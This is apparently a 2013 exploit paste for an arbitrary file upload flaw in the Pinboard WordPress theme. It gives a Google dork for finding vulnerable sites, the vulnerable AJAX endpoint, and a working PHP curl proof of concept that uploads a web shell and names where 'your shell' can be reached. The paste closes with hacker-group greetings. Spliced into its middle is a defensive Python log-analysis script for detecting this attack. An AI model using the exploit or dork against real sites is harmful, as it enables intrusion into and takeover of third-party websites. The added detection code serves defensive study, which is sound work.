Googleinurl

Exploit Title : Wordpress Themes Pinboard Arbitrary File Upload Vulnerability

Nov 26th, 2013
Exploit Title : Wordpress Themes Pinboard Arbitrary File Upload Vulnerability
#Author : ReC0ded
#Vendor : http://themify.me/
#Download : http://themify.me/themes/Pinboard
#Date : 22, November 2013.
#Type : php, html, htm, asp, etc.
#Category : Web Applications
#Vulnerability : File Upload
#Tested On : Windows 7 32-bit | Google Chrome

#Dork : inurl:/wp-content/themes/pinboard/ | USE YOUR BRAIN =))

#Exploit : http://victim/[PATH]/wp-content/themes/pinboard/themify/themify-ajax.php

#POC :

<?php
$uploadfile="ReC0ded.php";
$ch = curl_init("http://victim/[PATH]/wp-content/themes/pinboard/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

#Results See Your Shell On : http://victim/[PATH]/wp-content/themes/pinboard/uploads/{YOUR_FILE}.php
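A defender triaging web server logs for this issue would look for the two halves of the chain the advisory describes: a POST to the theme's upload endpoint with upload=1, followed by a script being served (and therefore executed) out of the theme's uploads directory. The Python below is an added detection example, not part of the original paste; the endpoint and directory paths are taken from the advisory above, and the access-log lines are constructed samples in combined log format.

```python
import re
from urllib.parse import urlsplit

# Constructed sample lines in Apache/Nginx combined log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Nov/2013:10:01:02 +0000] "GET /blog/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [26/Nov/2013:10:01:09 +0000] "POST /blog/wp-content/themes/pinboard/themify/themify-ajax.php?upload=1 HTTP/1.1" 200 310 "-" "curl/7.30.0"',
    '203.0.113.5 - - [26/Nov/2013:10:01:15 +0000] "GET /blog/wp-content/themes/pinboard/uploads/x.php HTTP/1.1" 200 88 "-" "curl/7.30.0"',
    '198.51.100.7 - - [26/Nov/2013:10:02:00 +0000] "GET /blog/wp-content/themes/pinboard/uploads/photo.jpg HTTP/1.1" 200 40000 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [26/Nov/2013:10:02:30 +0000] "GET /blog/wp-content/themes/pinboard/uploads/old.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Paths from the advisory: the vulnerable AJAX handler and where uploads land.
UPLOAD_ENDPOINT = "/wp-content/themes/pinboard/themify/themify-ajax.php"
UPLOAD_DIR = "/wp-content/themes/pinboard/uploads/"
# Extensions a typical PHP web server executes instead of serving as static content.
EXEC_EXT = (".php", ".php3", ".php4", ".php5", ".phtml")

def parse_line(line):
    """Split one combined-log line into its fields; return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    return {"ip": m["ip"], "ts": m["ts"], "method": m["method"],
            "path": url.path, "query": url.query, "status": int(m["status"])}

def find_pinboard_upload_abuse(lines):
    """Flag POSTs to the upload endpoint and successful requests for scripts under the
    theme's uploads directory; report client IPs that appear in both lists."""
    uploads, exec_hits = [], []
    for rec in filter(None, map(parse_line, lines)):
        if (rec["method"] == "POST" and rec["path"].endswith(UPLOAD_ENDPOINT)
                and "upload=1" in rec["query"].split("&")):
            uploads.append((rec["ip"], rec["ts"]))
        elif (UPLOAD_DIR in rec["path"] and rec["path"].lower().endswith(EXEC_EXT)
                and rec["status"] == 200):
            exec_hits.append((rec["ip"], rec["path"]))
    chained = sorted({ip for ip, _ in uploads} & {ip for ip, _ in exec_hits})
    return {"upload_posts": uploads, "exec_hits": exec_hits, "chained_ips": chained}

if __name__ == "__main__":
    for key, value in find_pinboard_upload_abuse(SAMPLE_LOG).items():
        print(key, value)
```

An IP in chained_ips is the strongest signal; a lone upload POST from an unauthenticated client is still worth checking against the contents of the uploads directory, since the access log cannot show whether the request carried a valid session.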
  30.  
#################### Say Yes ####################
$Greetz To : ./Newbie-Security ./Malang Cyber Crew ./Hacker Newbie ./Binus Hacker ./Indonesian Cyber Army ./Indonesian Security Down ./Indonesian Figther Cyber ./Devilzc0de ./Surabaya Blackhat
$Thanks To : ./All Member Newbie-Security Team We Loved ./DevilScreaM ./ShadoWNamE ./grub_err0r ./R3dh34d ./ice-cream ./win32conficker ./HMBP-02 ./Mr.Alf1anz ./casper